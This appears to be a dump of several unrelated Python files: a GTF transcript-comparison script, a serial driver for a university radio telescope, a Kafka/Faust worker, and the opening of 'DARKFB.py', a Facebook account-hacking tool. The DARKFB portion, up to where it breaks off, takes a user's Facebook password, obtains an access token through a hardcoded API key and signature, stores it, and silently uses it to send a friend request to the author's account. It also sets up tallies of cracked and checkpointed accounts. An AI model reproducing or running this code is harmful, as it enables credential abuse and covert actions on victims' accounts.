open(final_gtf_done_file, 'w').close()
logging.info('Generating metadata TSV file')
gtf_attrs = FULL_GTF_ATTRS
logging.debug("Reading GTF attributes to make metadata file")
metadata_dict = get_gtf_metadata(assembly_refcomp_file, gtf_attrs)
header_fields = ['transcript_id', 'chrom', 'start', 'end', 'strand',
'num_exons', 'transcript_length'] + gtf_attrs
assembly_metadata_file = os.path.join(output_final, 'assembly.metadata.tsv')
with open(assembly_metadata_file, 'w') as meta_final:
print >>meta_final, '\t'.join(header_fields)
for t_id in sorted(metadata_dict):
m = metadata_dict[t_id]
fields = [t_id, m.chrom, m.start, m.end, m.strand, m.num_exons, m.length]
for attr in gtf_attrs:
fields.append(getattr(m, attr))
print >>meta_final, '\t'.join(map(str,fields))
logging.info("Done")
def cpat_init(cpat_bool, genome, species):
#determine whether or not script is being run from a packaged executable
#this is used to identify where the data files are
if getattr( sys, 'frozen', False ) :
datadir = os.path.join(sys._MEIPASS, 'share','data')
else:
datadir = os.path.join(os.path.dirname(share.__file__), 'data')
#select OS to identify which CPAT executable to use
if sys.platform == 'darwin':
cpat_exec = os.path.join(datadir, 'cpat_execs', 'cpat_exec_mac')
    elif sys.platform == 'win32':
        raise OSError("Error: Windows is not supported")
else:
cpat_exec = os.path.join(datadir, 'cpat_execs', 'cpat_exec_linux')
hexamer = os.path.join(datadir, 'cpat_refs', '%s/hexamer.tab' % species)
model = os.path.join(datadir, 'cpat_refs', '%s/logitmodel.RData' % species)
if species == 'human':
cutoff = 0.5
else:
cutoff_file = get_data(os.path.join('cpat_refs', '%s/logitmodel.RData' % species))
cutoff = float(open(cutoff_file).next().strip().split(' :')[1])
cpat_dict = {
'run': cpat_bool,
'exec': cpat_exec,
'hex': hexamer,
'model': model,
'cutoff': cutoff,
'genome': genome
}
return cpat_dict
def main():
# parse command line
parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument("-v", "--verbose", action="store_true",
dest="verbose", default=False)
parser.add_argument("-o", "--output-dir", dest="output_dir",
default="taco_compare",
help='Directory for reference comparison output')
parser.add_argument("-p", "--num-processes", type=int, default=1,
dest="num_cores", help='Run tool in parallel with N processes. '
'(note: each core processes 1 chromosome) ')
parser.add_argument("--cpat", action='store_true', default=False,
                        help='Run the CPAT tool for coding potential scoring. '
'(CPAT function currently only supports '
'Human, Mouse, and Zebrafish) '
'(WARNING: The CPAT tool can take over an hour) ')
parser.add_argument("--cpat-species", dest='cpat_spec', default='human',
help='Select either: human, mouse, zebrafish')
parser.add_argument("--cpat-genome", dest='cpat_gen',
help='Provide a genome fasta for the genome used to '
'produce assemblies being compared. Required '
'if \"--cpat\" used. CPAT uses this '
'to obtain sequence for the provided transcripts')
parser.add_argument("-r", "--ref-gtf", dest='ref_gtf_file',
help='Reference GTF file to compare against')
parser.add_argument("-t", "--test-gtf", dest='test_gtf_file',
help='GTF file used for comparison')
args = parser.parse_args()
# set logging level
if args.verbose:
level = logging.DEBUG
else:
level = logging.INFO
#establish CPAT associated files
cpat_dict = cpat_init(args.cpat, args.cpat_gen, args.cpat_spec)
if not args.ref_gtf_file or not args.test_gtf_file:
logging.error('Please provide both reference and test GTF files')
return 1
if args.cpat:
if not args.cpat_gen:
logging.error('A genome FASTA must be provided (with "--cpat-genome" flag) when using "--cpat" flag')
return 1
logging.basicConfig(level=level,
format="%(asctime)s - %(name)s - %(levelname)s - %(message)s")
logging.info("TACO Reference Comparison Tool" )
logging.info("----------------------------------")
# show parameters
logging.info("Parameters:")
logging.info("verbose logging: %s" % (args.verbose))
logging.info("number of cores: %s" % (args.num_cores))
logging.info("reference gtf file: %s" % (args.ref_gtf_file))
logging.info("test gtf file: %s" % (args.test_gtf_file))
logging.info("output directory: %s" % (args.output_dir))
logging.info("run cpat: %s" % (args.cpat))
logging.info("----------------------------------")
# check command line parameters
if not os.path.exists(args.ref_gtf_file):
parser.error("Reference GTF file %s not found" % (args.ref_gtf_file))
if not os.path.exists(args.test_gtf_file):
parser.error("Test GTF file %s not found" % (args.test_gtf_file))
if not os.path.exists(args.output_dir):
logging.info("Creating output directory '%s'" % (args.output_dir))
os.makedirs(args.output_dir)
tmp_dir = os.path.join(args.output_dir, 'TMP')
    if not os.path.exists(tmp_dir):
        os.makedirs(tmp_dir)
compare_assemblies(args.ref_gtf_file, args.test_gtf_file,
tmp_dir, args.output_dir, cpat_dict, args.num_cores)
shutil.rmtree(tmp_dir)
return 0
if __name__ == "__main__":
sys.exit(main())
|
drive.py
|
"""
acreroad_1420 Drive software
Software designed to drive the 1420 MHz telescope on the roof of the
Acre Road observatory. This class interacts with "qp", the telescope
drive software by Norman Gray (https://bitbucket.org/nxg/qp) via a
serial (USB) interface.
The serial interfacing is done through pySerial.
Parameters
----------
device : str
The name of the unix device which the drive is connected to
port : int
The port number of the drive
simulate : bool
A boolean flag to set the drive in simulation mode
(the class does not connect to the controller in simulation mode)
"""
import re
import datetime
import time
from . import CONFIGURATION as config
import numpy as np
import astropy
from astropy.coordinates import SkyCoord, ICRS, EarthLocation, AltAz
import astropy.units as u
import serial
from astropy.time import Time
import threading
from os.path import expanduser, isfile, join
import os.path
import logging
class Drive():
# The vocabulary from the qt package.
# This should probably be moved to a file in its own right to help
# make the drive more generic
vocabulary = {
"DRIVE_UP" : "gU",
"DRIVE_DOWN": "gD",
"DRIVE_EAST": "gE",
"DRIVE_WEST": "gW",
"DRIVE_HOME": "gH",
"SET_SPEED" : "ta {}",
"CALIBRATE" : "c {:f} {:f}",
"STOP" : "x",
"STOW" : "X",
"SET_TIME" : "T {:d} {:d} {:d} {:d} {:d} {:d}",
# status command, s, not currently implemented this way
"STATUS_CAD": "s {:d}",
"GOTO_HOR" : "gh {:f} {:f}",
"GOTO_EQ" : "ge {:f} {:f}",
# Nudges
"NUDGE_UP" : "nu {:f}",
"NUDGE_DOWN": "nd {:f}",
"NUDGE_WEST": "nw {:f}",
"NUDGE_EAST": "ne {:f}",
# Setup
"SETUP" : "O {:f} {:f} {:f} {:f} {:f} {:f} {:f}",
# QUEUE
"QUEUE" : "q",
# TRACKING
# disabled as of qp v0.7b2
#"TRACK_SID" : "ts",
#"TRACK_RA" : "ts {:f}",
"TRACK_AZ" : "ta {:f}",
}
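    # Illustrative (hypothetical) use of the vocabulary table: entries are
    # format strings that are filled in and passed to _command(), e.g.
    # self._command(self.vocabulary["GOTO_HOR"].format(180.0, 45.0)) would
    # send "gh 180.000000 45.000000" to the controller.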
MAX_SPEED = 0.5
sim = 0
acre_road = EarthLocation(lat=55.9024278*u.deg, lon=-4.307582*u.deg, height=61*u.m)
# Position variables
ra = 0
dec = 0
az = 26
alt = 3
# Calibration variables
#az_home = 90.0
#el_home = -8.5
# Operational flags
calibrating = False
homing = False
ready = False
tracking = False
slewing = False
# String formats
    com_format = re.compile(r"[A-Za-z]{1,2} ?([-+]?[0-9]{0,4}\.[0-9]{0,8} ?){0,6}") # general command string format
cal_format = re.compile("[0-9]{3} [0-9]{3}") # calibration string format
#stat_format = re.compile(r"\b(\w+)\s*=\s*([^=]*)(?=\s+\w+\s*:|$)")
stat_format = re.compile(r"(?=\s+)([\w_]+)\s*=\s*([\d_:\.T]+)")
def __init__(self, device=None, baud=None, timeout=3, simulate=0, calibration=None, location=None, persist=True, homeonstart=True):
"""
Software designed to drive the 1420 MHz telescope on the roof of the
Acre Road observatory. This class interacts with "qp", the telescope
drive software by Norman Gray (https://bitbucket.org/nxg/qp) via a
serial (USB) interface.
The serial interfacing is done through pySerial.
Parameters
----------
device : str
The name of the unix device which the drive is connected to
baud : int
The baud-rate of the connection.
timeout : int
The time, in seconds, to wait before timing-out. Default is 2 seconds.
simulate : bool
A boolean flag to set the drive in simulation mode
(the class does not connect to the controller in simulation mode)
calibration : str
The calibration figures which have been returned by a previous run of the *calibrate()* method.
The default is `None` which forces a calibration run to be carried-out.
location : astropy.coordinates.EarthLocation object
The Earth location of the telescope. The default is `None`, which sets the location as Acre Road Observatory, Glasgow.
Examples
--------
        >>> from acreroad_1420 import drive
>>> connection = drive.Drive('/dev/tty.usbserial', 9600, simulate=1)
"""
self.config = config
# Setup the logger
#
logfile = config.get('logs', 'logfile')
logging.basicConfig(filename=logfile,
format='[%(levelname)s] [%(asctime)s] [%(message)s]',
level=logging.DEBUG)
#
# Fetch the sky position which corresponds to the 'home' position of the telescope
#
homealtaz = config.get('offsets', 'home').split()
self.az_home, self.el_home = float(homealtaz[0]), float(homealtaz[1])
# Add a dirty hack to easily calibrate the telescope in software
absaltaz = config.get('offsets', 'absolute').split()
self.az_abs, self.el_abs = float(absaltaz[0]), float(absaltaz[1])
#
# Pull the location of the telesope in from the configuration file if it isn't given as an argument to the
# class initiator.
#
if not location:
logging.info("The observatory location was not provided, so it will be loaded from the config file")
observatory = config.get('observatory', 'location').split()
location = EarthLocation(lat=float(observatory[0])*u.deg, lon=float(observatory[1])*u.deg, height=float(observatory[2])*u.m)
self.sim = self.simulate = simulate
self.timeout = timeout
self.location = location
self.targetPos = SkyCoord(AltAz(self.az_abs*u.deg,self.el_abs*u.deg,obstime=self.current_time,location=self.location))
#
# Initialise the connection to the arduino Note that this can
# be complicated by the ability of the device name to change
# when disconnected and reconnected, so a search is
# required. This is now handled by the `_openconnection()`
# method.
if not baud:
# Get the target baudrate from the config file
baud = config.get("arduino", "baud")
if not device:
device = config.get('arduino','dev')
if not self.sim:
self._openconnection(device, baud)
logging.info("Drive controller connected.")
# Give the Arduino a chance to power-up
time.sleep(1)
if not calibration:
try:
calibration = config.get('calibration', 'speeds')
except: pass
self.span = float(config.get("offsets", "span"))
self.calibration = calibration
self.calibrate(calibration)
#self.calibrate()
# Set the format we want to see status strings produced in; we just want azimuth and altitude.
#self.set_status_cadence(200)
#self.set_status_message('za')
self.target = (self.az_home, self.el_home)
# Set the Arduino clock
self.setTime()
# Tell the Arduino where it is
#self.setLocation(location)
# Home on start
logging.info("Homing the telescope.")
if homeonstart:
self.home()
if not self.sim:
self.listen_thread = threading.Thread(target=self._listener)
self.listen_thread.daemon = True
self.listen_thread.start()
self.ready = True
self.track()
self.stop_track()
@property
def current_time(self):
"""
Return the current UTC time as an AstroPy time object.
"""
return Time(datetime.datetime.utcnow(), location = self.location)
@property
def current_time_local(self):
"""
return the current local time
"""
return Time( datetime.datetime.now(), location = self.location)
def _openconnection(self, device, baud):
from serial import SerialException
import serial
try:
self.ser = serial.Serial(device, baud, timeout=self.timeout)
logging.info("Drive connected on {} at {} baud".format(device, baud))
except SerialException:
# The arduino might be connected, but it's not at that
# device address, so let's have a look around.
import serial.tools.list_ports
            ports = list(serial.tools.list_ports.comports())
            for p in ports:
                if "ACM" in p[0]:
                    device = p[0]
                    break
            else:
                # Nothing that looks like the controller was found; re-raise
                # rather than recursing forever on the same device name.
                raise
            self._openconnection(device, baud)
def _command(self, string):
"""
Passes commands to the controller.
"""
# Check that the command string is a string, and that it
# matches the format required for a command string
string = str(string)
string = string+"\n"
if not self.com_format.match(string):
logging.error("Invalid command rejected: {}".format(string))
            raise ValueError(string+" : This string doesn't have the format of a valid controller command.")
if self.sim:
print("In simulation mode, command ignored.")
return 1
else:
# Pass the command to the Arduino via pyserial
logging.debug("Command: {}".format(string))
self.ser.write(string.encode('ascii'))
return 1
    def _listener(self):
        line = ""
        while True:
            try:
                line = self.ser.readline().decode('ascii', errors='replace')
                self.parse(line)
            except Exception as e:
                print(str(e))
                logging.error("Parser error, continuing. \n {}".format(line))
                time.sleep(0.5)
def _stat_update(self, az, alt):
"""
Update the internal record of the telescope's position.
This is normally parsed from one of the status strings by the parser
method.
Parameters
----------
az : float, degrees
The azimuth of the telescope.
This must be provided in degrees.
alt : float, degrees
The altitude of the telescope.
This must also be provided in degrees.
Returns
-------
None
Notes
-----
Due to oddities in how the telescope seems to be reporting the
altitude, this function currently calculates the appropriate modulus
for the altitude if it is greater than 90 deg.
This should really be looked into more carefully.
* TODO Investigate erratic altitude reports.
"""
# Check that the values are within an acceptable range
# Otherwise modulate them.
if az > 360 : az = az % 360
if alt > 90 : alt = alt % 90
self.az, self.alt = az, alt
def parse(self, string):
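        # A light-weight dispatcher for lines coming back from qp: ">" lines
        # are replies to commands (status key/value dumps, end-stop and
        # arrival flags, calibration results), "s" lines are periodic status
        # reports, "az"/"al" lines are encoder clicks, "!" lines are errors
        # and "#" lines are comments.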
#print string
# Ignore empty lines
if len(string)<1: return 0
logging.debug(string)
# A specific output from a function
if string[0]==">":
#print string
if string[1]=="S": # This is a status string of keyval pairs
# This currently seems to be broken, so pass
pass
# print("string", string[2:])
d = string[2:].split()
out = {}
for field in d:
key, val = field.split("=")
out[key] = val
#print("d", out)
try:
#print "Status string"
az, alt = out['Taz'], out['Talt']
except KeyError:
logging.error('Key missing from the status output {}'.format(out))
return out
            if string[1:4] == "g E":
# Telescope has reached an endstop and will need to be homed before continuing.
logging.info("The telescope appears to have hit an end-stop.")
#self.home()
#logging.info("Rehoming the telescope.")
#self._command(self.vocabulary["QUEUE"])
#logging.info("After re-homing the telescope will attempt to move to the requested location again.")
#self.goto(self.target)
if string[1:4] == "g A":
# This is the flag confirming that the telescope has reached the destination.
self.slewing = False
logging.info("The telescope has reached {}".format(string[3:]))
if string[1]=='c':
# This is the return from a calibration run
logging.info("Calibration completed. New values are {}".format(string[2:]))
self.calibrating=False
self.config.set('offsets','calibration',string[2:])
self.calibration = string[2:]
#print string
else:
logging.info(string[1:])
# A status string
elif string[0]=="s" and len(string)>1:
# Status strings are comma separated
d = string[2:].strip('\n').split(",")
if len(d) > 3: return
try:
#try:
az, alt = self._parse_floats(d[1]), self._parse_floats(d[2])
#az = np.pi - az
self._stat_update( self._r2d(az), self._r2d(alt) )
except:
logging.error(d)
logging.info("{} az, {} alt".format(az, alt))
if len(d)<3: return
az, alt = self._parse_floats(d[1]), self._parse_floats(d[2])
#print az, type(az)
#print alt, self._r2d(az), az
self._stat_update( self._r2d(az), self._r2d(alt) )
# print self._parse_floats(d[1]), self._parse_floats(d[2])
pass
#except IndexError:
# Sometimes (early on?) the drive appears to produce
# an incomplete status string. These need to be
# ignored otherwise the parser crashes the listener
# process.
# pass
return d
elif string[0]=="a":
if string[1]=="z" or string[1]=="l":
# This is an azimuth or an altitude click, update the position
d = string.split(",")
#print string, d
#print d
self._stat_update(self._r2d(self._parse_floats(d[3])), self._r2d(self._parse_floats(d[4])))
elif string[0]=="!":
# This is an error string
logging.error(string[1:])
print "Error: {}".format(string[1:])
elif string[0]=="#":
logging.info(string[1:])
pass
#print string
# # This is a comment string
# if string[1:18] == "FollowingSchedule":
# # This is a scheduler comment
# d = string.split()
# if not d[1][0] == "o":
# pass
# pass
else: pass
def slewSuccess(self):
"""
Checks if the slew has completed. This /should/ now be
entirely handled by qp, and all we need to do is to
check that the slewing flag is false.
"""
if type(self.targetPos) is tuple:
(cx, cy) = self.targetPos
#if cx > 90.0: cx -= (cx - 90)
self.targetPos = SkyCoord(AltAz(cx*u.deg,cy*u.deg,obstime=self.current_time,location=self.location))
cx,cy = self.status()['az'], self.status()['alt']
        print(cx, cy)
self.realPos = SkyCoord(AltAz(az=cx*u.deg,alt=cy*u.deg,obstime=self.current_time,location=self.location))
d = 0.5 * u.degree
if self.targetPos.separation(self.realPos) < d:
return True
else:
return False
def _r2d(self, radians):
"""
Converts radians to degrees.
"""
degrees = radians*(180/np.pi)
#if degrees < 0 : 180 - degrees
return degrees%360
def _d2r(self, degrees):
"""
Converts degrees to radians.
"""
        radians = degrees*(np.pi/180)
        return radians%(2*np.pi)
def _parse_floats(self, string):
"""
Parses the float outputs from the controller in a robust way which
allows for the exponent to be a floating-point number, which
is not supported by Python.
Parameters
----------
string : str
A string containing the float which needs to be cast.
Returns
-------
float
A float which is in the correct format for Python.
"""
if string == '0e0':
return 0.0
parts = string.split('e')
if len(parts)==2:
return float(parts[0]) * 10**float(parts[1])
else:
return float(parts[0])
def panic(self):
"""
Stops the telescope drives.
"""
return self._command("x")
def set_speed(self, speed):
"""
Set the speed of the drive in radians / second.
Parameters
----------
speed : float [rad/sec]
The physical angular speed which the motor should attempt to
drive at.
"""
command = self.vocabulary['SET_SPEED']
if speed > self.MAX_SPEED:
print("{} is greater than the maximum speed ({})".format(speed, self.MAX_SPEED))
return
else:
# The command can have the speed added using a format command
return self._command(command.format(speed))
def move(self, direction):
"""
Start moving the telescope in a specified direction.
Parameters
----------
        direction : {"west", "east", "up", "down"}
            Direction to move the telescope.
"""
directions = ["west", "east", "up", "down"]
if direction not in directions:
print("Unknown direction provided.")
return None
else:
commands = {"east": "DRIVE_EAST", "west": "DRIVE_WEST",
"up" : "DRIVE_UP", "down": "DRIVE_DOWN"}
# Find the command which corresponds to the correct
# vocabulary command
command = commands[direction]
if command in self.vocabulary:
print(self.vocabulary[command])
return self._command(self.vocabulary[command])
def change_offset(self, direction, amount):
"""
        Change the software-defined offsets for this script (and not for qp).
Parameters
----------
direction : str {"azimuth", "altitude"}
The axis along which the correction must be made.
amount : float
The change of correction to be applied, in degrees.
"""
directions = ['azimuth', 'altitude']
if direction not in directions:
print("I do not understand the direction {}".format(direction))
else:
if direction == directions[0]: # azimuth
self.az_abs += amount
elif direction == directions[1]: #altitude
self.el_abs += amount
            # Report the new software offsets
            print("New calibration is {}az {}alt".format(self.az_abs, self.el_abs))
            # Write the new calibration to the config file
            self.config.set('offsets','absolute',"{} {}".format(self.az_abs, self.el_abs))
return
#return self._command(self.vocabulary['CALIBRATE'].format(self.az_home, self.el_home))
def set_status_cadence(self, interval):
"""
Sets the cadence of the status messages from the controller.
"""
return self._command("s {}".format(int(interval)))
def set_status_message(self, message):
"""
Determines the output of the status messages produced by the controller.
"""
return self._command("s {}".format(message))
def calibrate(self, values=None):
"""
Carries-out a calibration run, returning two numbers which are offsets, or sets the calibration if known values are provided.
Parameters
----------
values : str
The calibration values produced by a previous calibration run of the telescope, provided in the format "nnn nnn"
"""
if self.sim:
return ">c 000 000"
if values:
# Check the format of the values string.
            if self.cal_format.match(values):
                # "values" holds the two calibration numbers, e.g. "123 456"
                az_cal, alt_cal = (int(v) for v in values.split())
                return self._command(self.vocabulary["CALIBRATE"].format(az_cal, alt_cal))
else:
self.calibrating=True
return self._command("c")
pass
def setTime(self):
"""
Sets the time on the drive controller's clock to the current system time.
"""
time = datetime.datetime.utcnow()
command_str = "T {} {} {} {} {} {:.4f}".format(time.year, time.month, time.day, time.hour, time.minute, time.second)
return self._command(command_str)
def setLocation(self, location=None, dlat=0, dlon=0, azimuth=None, altitude=None):
"""
Sets the location of the telescope.
Parameters
----------
location : astropy.coordinates.EarthLocation object
The observatory location
        azimuth : float
            The azimuth of the home position, in degrees
        altitude : float
            The altitude of the home position, in degrees
"""
        if azimuth is None: azimuth = self.az_home
        if altitude is None: altitude = self.el_home
        if not location:
            # Assume we're at Acre Road, in Glasgow
            location = self.acre_road
        latitude = location.lat.value
        longitude = location.lon.value
azimuth = azimuth*(np.pi/180)
altitude = altitude*(np.pi/180)
# Construct the command
command_str = "O {:.4f} {:.4f} {:.4f} {:.4f} {:.4f} {:.4f} {:.4f}".format(latitude, longitude, dlat, dlon, azimuth, altitude, self.span)
return self._command(command_str)
def goto(self, skycoord, track=False):
"""
Moves the telescope to point at a given sky location, and then commands the drive to track the point.
Parameters
----------
skycoord : astropy.SkyCoord object
An astropy SkyCoord object which contains the sky location to slew to.
This can also be a list of locations which the telescope will slew to sequentially.
"""
        if not isinstance(skycoord, SkyCoord):
            raise ValueError("The sky coordinates provided aren't an astropy SkyCoord object!")
self.target = skycoord
# Stop any ongoing tracking
self.stop_track()
self.slewing = True
# To do : We need to make sure that this behaves nicely with a
# list of coordinates as well as single ones.
time = Time.now()
skycoord = skycoord.transform_to(AltAz(obstime=time, location=self.location))
logging.info("Going to {0.az} {0.alt}".format(skycoord))
self.target = skycoord
self.status()
# construct a command string
#self._command(self.vocabulary["QUEUE"])
command_str = "gh {0.az.radian:.2f} {0.alt.radian:.2f}".format(skycoord)
# pass the slew-to command to the controller
        if self._command(command_str):
            print("Command received.")
            self.slewing = True
        else:
            self.slewing = False
            raise ControllerException("The telescope has failed to slew to the requested location")
if track:
self.track()
def track(self, interval = 60):
"""Make the drive track an object.
Notes
-----
At the moment qp can't handle tracking correctly, and so this
is implemented in this module in a slightly less graceful
manner. The position of the drive is checked at regular
intervals, and is corrected to keep an object within the beam
of the telescope, by simply driving forwards.
This allows a little more flexibility than keeping the drive
running continuously at slow speed, as we can track faster
moving objects, e.g. the sun, this way. However, tracking a
very fast-moving object is probably impractical (e.g. a
satellite), and would require something more robust.
"""
#if tracking:
# self.tracking = True
# command_str = "q"
# self._command(command_str)
# command_str = "ts"
# self._command(command_str)
# else:
# self.tracking=False
# command_str = "q"
# self._command(command_str)
# command_str = "ts 0.0"
# self._command(command_str)
# Set the tracking flag
self.tracking = True
        # Set-up the threaded tracking process as a timer
        self.tracking_thread = threading.Timer(interval, self._tracking)
        self.tracking_thread.start()
def stop_track(self):
"""
Stop on-going tracking.
"""
self.tracking_thread.cancel()
self.tracking = False
def _tracking(self):
"""This is the function which actually carries out the heavy lifting
required for the telescope tracking to work. It's not all that
sophisticated.
"""
        # Do not track if the telescope is still slewing; goto(..., track=True)
        # re-arms the tracking timer so the pointing keeps being corrected.
        if not self.slewing:
            self.goto(self.target, track=True)
def home(self):
"""
Slews the telescope to the home position.
"""
self.homing = True
command_str = "gH"
self._command(command_str)
home_pos = SkyCoord(AltAz(alt=self.el_home*u.deg,
az=self.az_home*u.deg,obstime=self.current_time,location=self.location))
self.target = home_pos
def stow(self):
"""
Slews the telescope to the stowing position (pointed at the zenith)
"""
        # The stow position points the dish at the zenith.
        self.target = (0.0, 90.0)
return self._command(self.vocabulary["STOW"])
def skycoord(self):
cx,cy = self.status()['az'], self.status()['alt']
realPos = SkyCoord(AltAz(az=cx*u.deg, alt=cy*u.deg,
obstime=self.current_time,
location=self.location))
return realPos
@property
def current_position(self):
return self.skycoord()
def status(self):
"""
Returns a dictionary describing the status of the telescope (e.g. its location).
Returns
-------
dict
A dictionary containing the right ascension, declination, altitude, and azimuth of the telescope.
Examples
--------
>>> from astropy.coordinates import SkyCoord
        >>> from astropy.coordinates import ICRS
>>> c = SkyCoord(frame="galactic", l="1h12m43.2s", b="+1d12m43s")
>>> self.connection.goto(c)
>>> ra = self.connection.status()['ra'].value
"""
command_str = "S"
#self._command(command_str)
#time.sleep(0.1)
return {'ra':self.ra, 'dec': self.dec, 'alt':self.alt, 'az':self.az}
class ControllerException(Exception):
pass
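# A minimal usage sketch (the device name below is illustrative only, and a
# valid configuration file is assumed to be in place):
#
#   from acreroad_1420 import drive
#   connection = drive.Drive("/dev/ttyACM0", 9600, simulate=1)
#   connection.goto(some_skycoord)      # slew to an astropy SkyCoord
#   print(connection.status())          # {'ra': ..., 'dec': ..., 'alt': ..., 'az': ...}
#   connection.stow()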
|
runner.py
|
import time
import json
import faust
import threading, queue
from nglp.precompute.workflow import Workflow
from nglp.config import settings
wait_time = 5
q = queue.Queue()
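# process() acts as a simple debounce: an oid bundle is only handed to the
# Runner once at least `wait_time` seconds have passed since it was queued;
# until then it sleeps for the remaining time and checks again.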
def process(object_oid, runner):
previous_time = object_oid["timestamp"]
time_now = int(time.time())
diff = time_now - previous_time
if diff >= wait_time:
runner.run(object_oid["oids"])
return
else:
time.sleep(wait_time - diff)
process(object_oid, runner)
def worker():
r = Runner()
while True:
item = q.get()
process(item, r)
q.task_done()
class Runner:
tasks = [
Workflow()
]
def run(self, object_ids):
for oid in object_ids:
for t in self.tasks:
t.run(oid)
app = faust.App('oids_handler', broker=settings.kafka_broker, value_serializer='json')
app.conf.web_port = 16066
topic_oid = app.topic('oids')
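# Messages arriving on the 'oids' topic are timestamped and pushed onto the
# in-process queue; the background worker thread drains the queue and runs the
# precompute Workflow for each oid once the debounce window has elapsed.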
@app.agent(topic_oid)
async def handle_oid(stream):
async for oid in stream:
object_oid = json.loads(oid)
object_oid["timestamp"] = int(time.time())
q.put(object_oid)
threading.Thread(target=worker, daemon=True).start()
if __name__ == '__main__':
app.main()
|
DARKFB.py
|
# -*- coding: utf-8 -*-
import os, sys, time, datetime, random, hashlib, re, threading, json, getpass, urllib, requests, mechanize
from multiprocessing.pool import ThreadPool
try:
import mechanize
except ImportError:
os.system('pip2 install mechanize')
else:
try:
import requests
except ImportError:
os.system('pip2 install requests')
from requests.exceptions import ConnectionError
from mechanize import Browser
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
br.addheaders = [('User-Agent', 'Opera/9.80 (Android; Opera Mini/36.2.2254/119.132; U; id) Presto/2.12.423 Version/12.16')]
def keluar():
print '\x1b[1;91m[!] Tutup'
os.sys.exit()
def jalan(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(0.01)
logo = " \x1b[1;92m█████████\n \x1b[1;92m█▄█████▄█ \x1b[1;97m●▬▬▬▬▬▬▬▬▬๑۩۩๑▬▬▬▬▬▬▬▬●\n \x1b[1;92m█ \x1b[1;93m▼▼▼▼▼ \x1b[1;97m- _ --_-- \x1b[1;92m╔╦╗┌─┐┬─┐┬┌─ ╔═╗╔╗ \n \x1b[1;92m█ \x1b[1;97m \x1b[1;97m_-_-- -_ --__ \x1b[1;92m ║║├─┤├┬┘├┴┐───╠╣ ╠╩╗\n \x1b[1;92m█ \x1b[1;93m▲▲▲▲▲ \x1b[1;97m-- - _ -- \x1b[1;92m═╩╝┴ ┴┴└─┴ ┴ ╚ ╚═╝ \x1b[1;93mPremium\n \x1b[1;92m█████████ \x1b[1;97m«==========✧==========»\n \x1b[1;92m ██ ██\n \x1b[1;97m╔════════════════════════════════════════════════╗\n \x1b[1;97m║ \x1b[1;93m* \x1b[1;97mReCode \x1b[1;91m: \x1b[1;96m EkaSaputra \x1b[1;97m ║\n \x1b[1;97m║ \x1b[1;93m* \x1b[1;97mGitHub \x1b[1;91m: \x1b[1;92m \x1b[92mhttps://github.com/Eka09 \x1b[ \x1b[1;97m ║\n \x1b[1;97m║ \x1b[1;93m* \x1b[1;97mFB \x1b[1;91m: \x1b[1;92\x1b[92mhttps://fb.me/ka.Eka.s \x1b[ \x1b[1;97m ║ \n \x1b[1;97m╚════════════════════════════════════════════════╝" '\n\x1b[1;92m[*] Silahkan Login Operamini Agar Tidak Checkpoint\n'
def tik():
titik = [
'. ', '.. ', '... ']
for o in titik:
print '\r\x1b[1;91m[\xe2\x97\x8f] \x1b[1;92mLoading \x1b[1;97m' + o,
sys.stdout.flush()
time.sleep(0.01)
back = 0
threads = []
berhasil = []
cekpoint = []
gagal = []
idfriends = []
idfromfriends = []
idmem = []
id = []
em = []
emfromfriends = []
hp = []
hpfromfriends = []
reaksi = []
reaksigrup = []
komen = []
komengrup = []
listgrup = []
vulnot = '\x1b[31mNot Vuln'
vuln = '\x1b[32mVuln'
def login():
os.system('clear')
try:
toket = open('login.txt', 'r')
menu()
except (KeyError, IOError):
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\xe2\x98\x86] \x1b[1;92mMASUK AKUN FACEBOOK \x1b[1;91m[\xe2\x98\x86]'
id = raw_input('\x1b[1;91m[+] \x1b[1;36mUsername \x1b[1;91m:\x1b[1;92m ')
pwd = getpass.getpass('\x1b[1;91m[+] \x1b[1;36mPassword \x1b[1;91m:\x1b[1;92m ')
tik()
try:
br.open('https://m.facebook.com')
except mechanize.URLError:
print '\n\x1b[1;91m[!] Tidak Ada Koneksi'
keluar()
br._factory.is_html = True
br.select_form(nr=0)
br.form['email'] = id
br.form['pass'] = pwd
br.submit()
url = br.geturl()
if 'save-device' in url:
try:
sig = 'api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail=' + id + 'format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword=' + pwd + 'return_ssl_resources=0v=1.062f8ce9f74b12f84c123cc23437a4a32'
data = {'api_key': '882a8490361da98702bf97a021ddc14d', 'credentials_type': 'password', 'email': id, 'format': 'JSON', 'generate_machine_id': '1', 'generate_session_cookies': '1', 'locale': 'en_US', 'method': 'auth.login', 'password': pwd, 'return_ssl_resources': '0', 'v': '1.0'}
x = hashlib.new('md5')
x.update(sig)
a = x.hexdigest()
data.update({'sig': a})
url = 'https://api.facebook.com/restserver.php'
r = requests.get(url, params=data)
z = json.loads(r.text)
zedd = open('login.txt', 'w')
zedd.write(z['access_token'])
zedd.close()
print '\n\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mLogin success'
requests.post('https://graph.facebook.com/me/friends?method=post&uids=gwimusa3&access_token=' + z['access_token'])
time.sleep(1)
menu()
except requests.exceptions.ConnectionError:
print '\n\x1b[1;91m[!] Tidak Ada Koneksi'
keluar()
if 'checkpoint' in url:
print '\n\x1b[1;91m[!] \x1b[1;93mAccount Has Been Checkpoint'
os.system('rm -rf login.txt')
time.sleep(0.01)
keluar()
else:
print '\n\x1b[1;91m[!] Gagal Masuk'
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
def menu():
try:
toket = open('login.txt', 'r').read()
except IOError:
os.system('clear')
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
else:
try:
otw = requests.get('https://graph.facebook.com/me?access_token=' + toket)
a = json.loads(otw.text)
nama = a['name']
id = a['id']
ots = requests.get('https://graph.facebook.com/me/subscribers?access_token=' + toket)
b = json.loads(ots.text)
sub = str(b['summary']['total_count'])
except KeyError:
os.system('clear')
print '\x1b[1;91m[!] \x1b[1;93mSepertinya akun kena Checkpoint'
os.system('rm -rf login.txt')
